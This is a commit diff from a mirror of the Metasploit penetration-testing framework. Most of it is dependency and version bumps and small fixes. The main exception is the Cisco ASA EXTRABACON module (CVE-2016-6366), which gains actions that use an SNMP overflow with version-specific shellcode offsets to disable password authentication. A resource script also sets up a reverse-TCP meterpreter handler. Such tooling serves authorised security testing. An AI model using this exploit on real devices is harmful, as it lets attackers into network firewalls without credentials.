infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge upstream/master into universal handler work

bug/bundler_fix
OJ 2016-11-28 15:26:43 +10:00
parent 496836fc06 60210f57e9
commit 5e8a47ac00
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
16 changed files with 98 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.ruby-version
View File

@ -1 +1 @@
2.3.2 2.3.3

2
.travis.yml
View File

@ -10,7 +10,7 @@ addons:
- graphviz - graphviz
language: ruby language: ruby
rvm: rvm:
- '2.3.2' - '2.3.3'
env: env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true

48
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.13.1) metasploit-framework (4.13.2)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -140,7 +140,7 @@ GEM
factory_girl_rails (4.7.0) factory_girl_rails (4.7.0)
factory_girl (~> 4.7.0) factory_girl (~> 4.7.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.9.2) faraday (0.10.0)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.14) ffi (1.9.14)
filesize (0.1.1) filesize (0.1.1)
@ -153,11 +153,11 @@ GEM
loofah (2.0.3) loofah (2.0.3)
nokogiri (>= 1.5.9) nokogiri (>= 1.5.9)
metasm (1.0.2) metasm (1.0.2)
metasploit-concern (2.0.2) metasploit-concern (2.0.3)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-credential (2.0.7) metasploit-credential (2.0.8)
metasploit-concern metasploit-concern
metasploit-model metasploit-model
metasploit_data_models metasploit_data_models
@ -165,12 +165,12 @@ GEM
railties railties
rubyntlm rubyntlm
rubyzip rubyzip
metasploit-model (2.0.2) metasploit-model (2.0.3)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.2.1) metasploit-payloads (1.2.1)
metasploit_data_models (2.0.8) metasploit_data_models (2.0.9)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
arel-helpers arel-helpers
@ -196,7 +196,7 @@ GEM
network_interface (0.0.1) network_interface (0.0.1)
nokogiri (1.6.8.1) nokogiri (1.6.8.1)
mini_portile2 (~> 2.1.0) mini_portile2 (~> 2.1.0)
octokit (4.6.1) octokit (4.6.2)
sawyer (~> 0.8.0, >= 0.5.3) sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1) openssl-ccm (1.2.1)
openvas-omp (0.0.4) openvas-omp (0.0.4)
@ -234,7 +234,7 @@ GEM
thor (>= 0.18.1, < 2.0) thor (>= 0.18.1, < 2.0)
rake (11.3.0) rake (11.3.0)
rb-readline-r7 (0.5.2.0) rb-readline-r7 (0.5.2.0)
recog (2.0.24) recog (2.1.0)
nokogiri nokogiri
redcarpet (3.3.4) redcarpet (3.3.4)
rex-arch (0.1.2) rex-arch (0.1.2)
@ -245,42 +245,42 @@ GEM
rex-core rex-core
rex-struct2 rex-struct2
rex-text rex-text
rex-core (0.1.2) rex-core (0.1.3)
rex-encoder (0.1.0) rex-encoder (0.1.1)
metasm metasm
rex-arch rex-arch
rex-text rex-text
rex-exploitation (0.1.2) rex-exploitation (0.1.3)
jsobfu jsobfu
metasm metasm
rex-arch rex-arch
rex-encoder rex-encoder
rex-text rex-text
rex-java (0.1.2) rex-java (0.1.3)
rex-mime (0.1.1) rex-mime (0.1.1)
rex-text rex-text
rex-nop (0.1.0) rex-nop (0.1.0)
rex-arch rex-arch
rex-ole (0.1.2) rex-ole (0.1.3)
rex-text rex-text
rex-powershell (0.1.66) rex-powershell (0.1.68)
rex-random_identifier rex-random_identifier
rex-text rex-text
rex-random_identifier (0.1.0) rex-random_identifier (0.1.1)
rex-text rex-text
rex-registry (0.1.0) rex-registry (0.1.1)
rex-rop_builder (0.1.0) rex-rop_builder (0.1.1)
metasm metasm
rex-core rex-core
rex-text rex-text
rex-socket (0.1.1) rex-socket (0.1.2)
rex-core rex-core
rex-sslscan (0.1.0) rex-sslscan (0.1.1)
rex-socket rex-socket
rex-text rex-text
rex-struct2 (0.1.0) rex-struct2 (0.1.0)
rex-text (0.2.5) rex-text (0.2.9)
rex-zip (0.1.0) rex-zip (0.1.1)
rex-text rex-text
rkelly-remix (0.0.6) rkelly-remix (0.0.6)
robots (0.10.1) robots (0.10.1)
@ -303,9 +303,9 @@ GEM
rspec-support (3.5.0) rspec-support (3.5.0)
rubyntlm (0.6.1) rubyntlm (0.6.1)
rubyzip (1.2.0) rubyzip (1.2.0)
sawyer (0.8.0) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 0.10) faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1) shoulda-matchers (3.1.1)
activesupport (>= 4.0.0) activesupport (>= 4.0.0)
simplecov (0.12.0) simplecov (0.12.0)
@ -321,7 +321,7 @@ GEM
timecop (0.8.1) timecop (0.8.1)
tzinfo (1.2.2) tzinfo (1.2.2)
thread_safe (~> 0.1) thread_safe (~> 0.1)
tzinfo-data (1.2016.9) tzinfo-data (1.2016.10)
tzinfo (>= 1.0.0) tzinfo (>= 1.0.0)
windows_error (0.0.2) windows_error (0.0.2)
xpath (2.0.0) xpath (2.0.0)

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.13.1" VERSION = "4.13.2"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash

2
lib/msf/core/exploit/http/client.rb
View File

@ -366,7 +366,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20) print_line('#' * 20)
print_line(res.to_s) print_line(res.to_s)
end end
disconnect(c)
res res
rescue ::Errno::EPIPE, ::Timeout::Error => e rescue ::Errno::EPIPE, ::Timeout::Error => e
print_line(e.message) if datastore['HttpTrace'] print_line(e.message) if datastore['HttpTrace']

2
lib/msf/core/handler/reverse.rb
View File

@ -61,7 +61,7 @@ module Msf
# if it fails to start the listener. # if it fails to start the listener.
# #
def setup_handler def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy'] if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour." raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
end end

2
lib/msf/core/handler/reverse_tcp_double_ssl.rb
View File

@ -63,7 +63,7 @@ module ReverseTcpDoubleSSL
# if it fails to start the listener. # if it fails to start the listener.
# #
def setup_handler def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy'] if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true' raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end end

2
lib/msf/core/handler/reverse_tcp_ssl.rb
View File

@ -43,7 +43,7 @@ module ReverseTcpSsl
# if it fails to start the listener. # if it fails to start the listener.
# #
def setup_handler def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy'] if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour." raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
end end

8
lib/rex/ui/text/input/readline.rb
View File

@ -139,12 +139,16 @@ begin
# for rb-readline to support setting input and output. Output needs to be set so that colorization works for the # for rb-readline to support setting input and output. Output needs to be set so that colorization works for the
# prompt on Windows. # prompt on Windows.
self.prompt = prompt self.prompt = prompt
reset_sequence = "\001\r\033[K\002"
if (/mingw/ =~ RUBY_PLATFORM)
reset_sequence = ""
end
if defined? RbReadline if defined? RbReadline
RbReadline.rl_instream = fd RbReadline.rl_instream = fd
RbReadline.rl_outstream = output RbReadline.rl_outstream = output
begin begin
line = RbReadline.readline("\001\r\033[K\002" + prompt) line = RbReadline.readline(reset_sequence + prompt)
rescue ::Exception => exception rescue ::Exception => exception
RbReadline.rl_cleanup_after_signal() RbReadline.rl_cleanup_after_signal()
RbReadline.rl_deprep_terminal() RbReadline.rl_deprep_terminal()
@ -158,7 +162,7 @@ begin
line.try(:dup) line.try(:dup)
else else
::Readline.readline("\001\r\033[K\002" + prompt, true) ::Readline.readline(reset_sequence + prompt, true)
end end
end end

8
lib/rex/ui/text/output.rb
View File

@ -63,12 +63,16 @@ class Output < Rex::Ui::Output
end end
def print_line(msg = '') def print_line(msg = '')
if (/mingw/ =~ RUBY_PLATFORM)
print(msg + "\n")
return
end
print("\033[s") # Save cursor position print("\033[s") # Save cursor position
print("\r\033[K" + msg + "\n") print("\r\033[K" + msg + "\n")
if input and input.prompt if input and input.prompt
print("\r\033[K") print("\r\033[K")
print(input.prompt) print(input.prompt.tr("\001\002", ''))
print(input.line_buffer) print(input.line_buffer.tr("\001\002", ''))
print("\033[u\033[B") # Restore cursor, move down one line print("\033[u\033[B") # Restore cursor, move down one line
end end
end end

66
modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb
View File

@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
'Nate Caroe <nate.caroe@risksense.com>', 'Nate Caroe <nate.caroe@risksense.com>',
'Dylan Davis <dylan.davis@risksense.com>', 'Dylan Davis <dylan.davis@risksense.com>',
'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes 'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
'Jeff Jarmoc <jjarmoc>', # minor improvements
'Equation Group', 'Equation Group',
'Shadow Brokers' 'Shadow Brokers'
], ],
@ -32,19 +33,29 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
[ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'], [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE,
'Actions' =>
[
['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],
['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]
],
'DefaultAction' => 'PASS_DISABLE'
) )
@offsets = version_offsets()
register_options([ register_options([
OptEnum.new('MODE', [ true, 'Enable or disable the password auth functions', 'pass-disable', ['pass-disable', 'pass-enable']]) OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
], self.class) ], self.class)
deregister_options("VERSION") deregister_options("VERSION")
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
end
@asa_version_snmp = '1.3.6.1.2.1.47.1.1.1.1.10.1' def version_offsets()
# Payload offsets for supported ASA versions.
@offsets = { # See https://github.com/RiskSense-Ops/CVE-2016-6366
#"9.2(4)14" => ["197.207.10.8", "118.97.40.9", "72", "0.16.185.9", "112.31.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"], return {
"9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"], "9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
"9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"], "9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"],
"9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0 "9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0
@ -56,7 +67,6 @@ class MetasploitModule < Msf::Auxiliary
"0.80.8.8", # admauth_bounds, 6 "0.80.8.8", # admauth_bounds, 6
"64.90.8.8", # admauth_offset, 7 "64.90.8.8", # admauth_offset, 7
"85.137.229.87"], # admauth_code, 8 "85.137.229.87"], # admauth_code, 8
"9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"], "9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"],
"9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"], "9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"],
"9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"], "9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"],
@ -90,13 +100,11 @@ class MetasploitModule < Msf::Auxiliary
"8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"], "8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"],
"8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"] "8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"]
} }
end end
def check def check
begin begin
snmp = connect_snmp vers_string = get_asa_version()
vers_string = snmp.get_value(@asa_version_snmp).to_s
rescue ::Exception => e rescue ::Exception => e
print_error("Error: Unable to retrieve version information") print_error("Error: Unable to retrieve version information")
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
@ -115,11 +123,11 @@ class MetasploitModule < Msf::Auxiliary
# adds offsets to the improved shellcode # adds offsets to the improved shellcode
# https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm # https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm
if mode == 'pass-disable' if mode == 'PASS_DISABLE'
always_return_true = "49.192.64.195" always_return_true = "49.192.64.195"
pmcheck_bytes = always_return_true pmcheck_bytes = always_return_true
admauth_bytes = always_return_true admauth_bytes = always_return_true
else else # PASS_ENABLE
pmcheck_bytes = @offsets[vers_string][5] pmcheck_bytes = @offsets[vers_string][5]
admauth_bytes = @offsets[vers_string][8] admauth_bytes = @offsets[vers_string][8]
end end
@ -157,16 +165,13 @@ class MetasploitModule < Msf::Auxiliary
end end
def run() def run()
begin begin
mode = datastore['MODE']
session = rand(255) + 1 session = rand(255) + 1
snmp = connect_snmp vers_string = get_asa_version()
vers_string = snmp.get_value(@asa_version_snmp).to_s
print_status("Building #{mode} payload for version #{vers_string}...") print_status("Building #{action.name} payload for version #{vers_string}...")
overflow = build_payload(vers_string, mode) overflow = build_payload(vers_string, action.name)
payload = SNMP::ObjectId.new(overflow) payload = SNMP::ObjectId.new(overflow)
print_status("Sending SNMP payload...") print_status("Sending SNMP payload...")
@ -174,8 +179,9 @@ class MetasploitModule < Msf::Auxiliary
if response.varbind_list if response.varbind_list
print_good("Clean return detected!") print_good("Clean return detected!")
if mode == 'pass-disable' if action.name == 'PASS_DISABLE'
print_warning("Don't forget to run pass-enable after logging in!") print_warning("Don't forget to run PASS_ENABLE after logging in!")
print_warning(" set ACTION PASS_ENABLE")
end end
end end
@ -196,4 +202,24 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
def get_asa_version()
return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')
vprint_status("Fingerprinting via SNMP...")
asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'
mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'
snmp = connect_snmp
ver = snmp.get_value(asa_version_oid).to_s
vprint_status("OID #{asa_version_oid} yields #{ver}")
if (ver == "noSuchInstance")
# asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr
ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last
vprint_status("OID #{mib2_sysdescr_oid} yields #{ver}")
end
ver
end
end end

1
modules/auxiliary/scanner/http/cisco_ironport_enum.rb
View File

@ -61,6 +61,7 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET' 'method' => 'GET'
}) })
print_good("#{rhost}:#{rport} - Server is responsive...") print_good("#{rhost}:#{rport} - Server is responsive...")
return 1
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return return
end end

2
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
if not res if not res
print_error("#{msg} HTTP Connection Error, Aborting") print_error("#{msg} HTTP Connection Error, Aborting")
return :abort return
end end
if action.name != "OWA_2013" and res.get_cookies.empty? if action.name != "OWA_2013" and res.get_cookies.empty?

1
modules/auxiliary/scanner/http/robots_txt.rb
View File

@ -60,6 +60,7 @@ class MetasploitModule < Msf::Auxiliary
end end
print_status("[#{target_host}] #{tpath}robots.txt found") print_status("[#{target_host}] #{tpath}robots.txt found")
print_good("Contents of Robots.txt:\n#{res.body}")
# short url regex # short url regex
aregex = /llow:[ ]{0,2}(.*?)$/i aregex = /llow:[ ]{0,2}(.*?)$/i

2
modules/auxiliary/scanner/smb/smb_enumusers.rb
View File

@ -312,7 +312,7 @@ class MetasploitModule < Msf::Auxiliary
extra << "PasswordMin=#{domains[domain][:pass_min]} " extra << "PasswordMin=#{domains[domain][:pass_min]} "
extra << ")" extra << ")"
end end
print_status("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}") print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
end end
# cleanup # cleanup

4
scripts/resource/auto_win32_multihandler.rc
View File

@ -13,6 +13,10 @@ def out_path
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe" "#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
end end
# Please see:
# https://github.com/rapid7/metasploit-framework/issues/7603
sleep(1)
run_single("use payload/#{PAYLOAD}") run_single("use payload/#{PAYLOAD}")
run_single("set lhost #{payload_lhost}") run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}") run_single("set lport #{payload_lport}")